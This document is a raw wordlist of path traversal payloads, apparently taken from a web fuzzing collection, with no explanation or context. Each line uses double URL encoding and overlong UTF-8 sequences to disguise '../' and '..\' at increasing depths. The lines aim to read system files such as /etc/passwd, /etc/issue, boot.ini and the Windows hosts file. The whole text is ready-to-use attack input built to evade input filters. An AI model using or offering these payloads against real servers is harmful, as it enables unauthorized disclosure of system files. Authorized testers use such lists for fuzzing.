-%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66etc%%32%%66passwd -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66etc%%32%%66issue -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66boot.ini -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66etc%%32%%66passwd -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66etc%%32%%66issue -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66boot.ini -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66etc%%32%%66passwd -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66etc%%32%%66issue -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66boot.ini -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%%32%%65%%32%%65%%35%%63etc%%35%%63passwd -%%32%%65%%32%%65%%35%%63etc%%35%%63issue -%%32%%65%%32%%65%%35%%63boot.ini -%%32%%65%%32%%65%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63etc%%35%%63passwd -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63etc%%35%%63issue -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63boot.ini -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63etc%%35%%63passwd -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63etc%%35%%63issue -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63boot.ini -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63etc%%35%%63passwd -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63etc%%35%%63issue -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63boot.ini -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63etc%%35%%63passwd -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63etc%%35%%63issue -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63boot.ini -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63etc%%35%%63passwd -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63etc%%35%%63issue -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63boot.ini -%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63%%32%%65%%32%%65%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%%32%%65%%32%%65%e0%80%afetc%e0%80%afpasswd -%%32%%65%%32%%65%e0%80%afetc%e0%80%afissue -%%32%%65%%32%%65%e0%80%afboot.ini -%%32%%65%%32%%65%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afetc%e0%80%afpasswd -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afetc%e0%80%afissue -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afboot.ini -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afetc%e0%80%afpasswd -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afetc%e0%80%afissue -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afboot.ini -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afetc%e0%80%afpasswd -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afetc%e0%80%afissue -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afboot.ini -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afetc%e0%80%afpasswd -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afetc%e0%80%afissue -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afboot.ini -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afetc%e0%80%afpasswd -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afetc%e0%80%afissue -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afboot.ini -%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%af%%32%%65%%32%%65%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%%32%%65%%32%%65%25c1%259cetc%25c1%259cpasswd -%%32%%65%%32%%65%25c1%259cetc%25c1%259cissue -%%32%%65%%32%%65%25c1%259cboot.ini -%%32%%65%%32%%65%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cetc%25c1%259cpasswd -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cetc%25c1%259cissue -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cboot.ini -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cetc%25c1%259cpasswd -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cetc%25c1%259cissue -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cboot.ini -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cetc%25c1%259cpasswd -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cetc%25c1%259cissue -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cboot.ini -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cetc%25c1%259cpasswd -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cetc%25c1%259cissue -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cboot.ini -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cetc%25c1%259cpasswd -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cetc%25c1%259cissue -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cboot.ini -%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259c%%32%%65%%32%%65%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%%32%%65%%32%%65%25c0%25afetc%25c0%25afpasswd -%%32%%65%%32%%65%25c0%25afetc%25c0%25afissue -%%32%%65%%32%%65%25c0%25afboot.ini -%%32%%65%%32%%65%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afetc%25c0%25afpasswd -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afetc%25c0%25afissue -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afboot.ini -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afetc%25c0%25afpasswd -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afetc%25c0%25afissue -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afboot.ini -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afetc%25c0%25afpasswd -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afetc%25c0%25afissue -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afboot.ini -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afetc%25c0%25afpasswd -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afetc%25c0%25afissue -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afboot.ini -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afetc%25c0%25afpasswd -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afetc%25c0%25afissue -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afboot.ini -%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25af%%32%%65%%32%%65%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%%32%%65%%32%%65%f0%80%80%afetc%f0%80%80%afpasswd -%%32%%65%%32%%65%f0%80%80%afetc%f0%80%80%afissue -%%32%%65%%32%%65%f0%80%80%afboot.ini -%%32%%65%%32%%65%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afetc%f0%80%80%afpasswd -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afetc%f0%80%80%afissue -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afboot.ini -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afetc%f0%80%80%afpasswd -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afetc%f0%80%80%afissue -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afboot.ini -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afetc%f0%80%80%afpasswd -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afetc%f0%80%80%afissue -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afboot.ini -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afetc%f0%80%80%afpasswd -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afetc%f0%80%80%afissue -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afboot.ini -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afetc%f0%80%80%afpasswd -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afetc%f0%80%80%afissue -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afboot.ini -%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%af%%32%%65%%32%%65%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%%32%%65%%32%%65%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%%32%%65%%32%%65%f8%80%80%80%afetc%f8%80%80%80%afissue -%%32%%65%%32%%65%f8%80%80%80%afboot.ini -%%32%%65%%32%%65%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afetc%f8%80%80%80%afissue -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afboot.ini -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afetc%f8%80%80%80%afissue -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afboot.ini -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afetc%f8%80%80%80%afissue -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afboot.ini -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afetc%f8%80%80%80%afissue -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afboot.ini -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afetc%f8%80%80%80%afissue -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afboot.ini -%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%af%%32%%65%%32%%65%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%e0%80%ae%e0%80%ae/etc/passwd -%e0%80%ae%e0%80%ae/etc/issue -%e0%80%ae%e0%80%ae/boot.ini -%e0%80%ae%e0%80%ae/windows/system32/drivers/etc/hosts -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/passwd -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/issue -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/boot.ini -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/windows/system32/drivers/etc/hosts -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/passwd -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/issue -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/boot.ini -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/windows/system32/drivers/etc/hosts -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/passwd -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/issue -%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/boot.ini 